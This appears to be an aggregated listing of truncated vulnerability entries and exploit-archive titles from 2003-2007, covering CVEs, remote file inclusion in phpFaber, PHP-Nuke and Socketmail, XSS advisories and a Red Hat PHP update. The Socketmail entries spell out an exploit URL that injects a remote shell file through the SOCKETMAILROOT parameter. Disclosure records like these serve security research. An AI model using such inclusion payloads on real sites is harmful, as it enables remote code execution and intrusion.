CVE-2007-5956

Directory traversal vulnerability in IBM Informix Dynamic Server IDS before 10.00.xC7W1 allows local users to gain privileges by referencing modified NLS message files through directory traversal sequences in the DBLANG environment variable...

autoindex-xss.txt

====================================================================== AutoIndex Impact: Cross Site Scripting Denial of Service DoS Status: patch available ------------------------------ Affected software description: ------------------------------ Application: AutoIndex Version:...

phpfaber-rfi.txt

/ \ @ /|\ /|\ |-| / | \ /|/\ / | \ @ | |--------------------/--|-voV---|'/--Vov-|-----------------------|-| |-| '^ o o '^ | | | | \Y/' |-| |-| | | | | -=ShAd0w-CrEw=- |-| |-| | | | | |-| ||| | @ l /\ / \ /\ l |-| l / V \ \ V \ l @ l/ \I \ /' ---------------------------------------------- GrEeTs...

phpFaber URLInn 2.0.5 - 'dir_ws' Remote File Inclusion

/ \ @ /|\ /|\ |-| / | \ /|/\ / | \ @ | |--------------------/--|-voV---|'/--Vov-|-----------------------|-| |-| '^ o o '^ | | | | \Y/' |-| |-| | | | | -=ShAd0w-CrEw=- |-| |-| | | | | |-| ||| | @ l /\ / \ /\ l |-| l / V \ \ V \ l @ l/ \I \ /' ---------------------------------------------- GrEeTs...

phpFaber URLInn 2.0.5 (dir_ws) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================== phpFaber URLInn 2.0.5 dirws Remote File Inclusion Vulnerability ================================================================== / \ @ /|\ /|\ |-| / | \ /|/\ / | \ @ |...

phpFaber URLInn 2.0.5 - dir_ws Remote File Inclusion

phpFaber URLInn 2.0.5 - dirws Remote File Inclusion / \ @ /|\ /|\ |-| / | \ /|/\ / | \ @ | |--------------------/--|-voV---|'/--Vov-|-----------------------|-| |-| '^ o o '^ | | | | \Y/' |-| |-| | | | | -=ShAd0w-CrEw=- |-| |-| | | | | |-| ||| | @ l /\ / \ /\ l |-| l / V \ \ V \ l @ l/ \I \ /'...

CVE-2007-5682

Incomplete blacklist vulnerability in tiki-graphformula.php in TikiWiki before 1.9.8.2 allows remote attackers to execute arbitrary code by using variable functions and variable variables to write variables whose names match the whitelist, a different vulnerability than CVE-2007-5423...

CVE-2007-5682

CVE-2007-5682 is an incomplete blacklist vulnerability in tiki-graph_formula.php of TikiWiki up to versions before 1.9.8.2, enabling a remote attacker to execute arbitrary PHP code by abusing variable functions/variables to write names matching the whitelist. This is a separate issue from CVE-200...

CVE-2003-1516

The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.201 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet...

CVE-2003-1473

Buffer overflow in LTris 1.0.1 of FreeBSD Ports Collection 2003-02-25 and earlier allows local users to execute arbitrary code with gid "games" permission via a long HOME environment variable...

Moderate: Red Hat Security Advisory: php security update

Updated PHP packages that fix several security issues are now available for Red Hat Application Stack. This update has been rated as having moderate security impact by the Red Hat Security Response Team. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. The...

CVE-2003-1446

Buffer overflow in the saveintofile function in save.c for Rogue 5.2-2 allows local users to execute arbitrary code with games group privileges by setting a long HOME environment variable and invoking the save game function with a tilde...

CVE-2003-1452

Untrusted search path vulnerability in Qualcomm qpopper 4.0 through 4.05 allows local users to execute arbitrary code by modifying the PATH environment variable to reference a malicious smbpasswd program...

PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion

PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion ---------------------------------------------- GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEaTs To ---------------------------------------------- A2J, Chucks, The Pitbull, ICQBomber, str0ke ---------------------------------------------- BiG sHoUt OuT tO...

PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion

---------------------------------------------- GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEaTs To ---------------------------------------------- A2J, Chucks, The Pitbull, ICQBomber, str0ke ---------------------------------------------- BiG sHoUt OuT tO udplink.net & ascnet.biz :...

[Full-disclosure] ifnet.it WEBIF XSS Vulnerability

----------------------------- || WWW.SMASH-THE-STACK.NET || ----------------------------- || ADVISORY: IFNET.IT WEBIF XSS VULNERABILITY || 0x00: ABOUT ME || 0x01: DATELINE || 0x02: INFORMATION || 0x03: EXPLOITATION || 0x04: GOOGLE DORK || 0x05: RISK LEVEL || 0x00: ABOUT ME Author: SkyOut Date:...

phpnukeplat-rfi.txt

---------------------------------------------- GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEaTs To ---------------------------------------------- A2J, Chucks, The Pitbull, ICQBomber, str0ke ---------------------------------------------- BiG sHoUt OuT tO udplink.net & ascnet.biz :...

socketmail-rfi.txt

Vulnerability Type: Remote File Inclusion Vulnerable file: /mail/content/fnc-readmail3.php Exploit URL: http://localhost/mail/content/fnc-readmail3.php?SOCKETMAILROOT=http://localhost/shell.txt? Method: get Registerglobals: On Vulnerable variable: SOCKETMAILROOT Line number: 399 Lines:...

Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion

Vulnerability Type: Remote File Inclusion Vulnerable file: /mail/content/fnc-readmail3.php Exploit URL: http://localhost/mail/content/fnc-readmail3.php?SOCKETMAILROOT=http://localhost/shell.txt? Method: get Registerglobals: On Vulnerable variable: SOCKETMAILROOT Line number: 399 Lines:...

Socketmail 2.2.8 - fnc-readmail3.php Remote File Inclusion

Socketmail 2.2.8 - fnc-readmail3.php Remote File Inclusion Vulnerability Type: Remote File Inclusion Vulnerable file: /mail/content/fnc-readmail3.php Exploit URL: http://localhost/mail/content/fnc-readmail3.php?SOCKETMAILROOT=http://localhost/shell.txt? Method: get Registerglobals: On Vulnerable...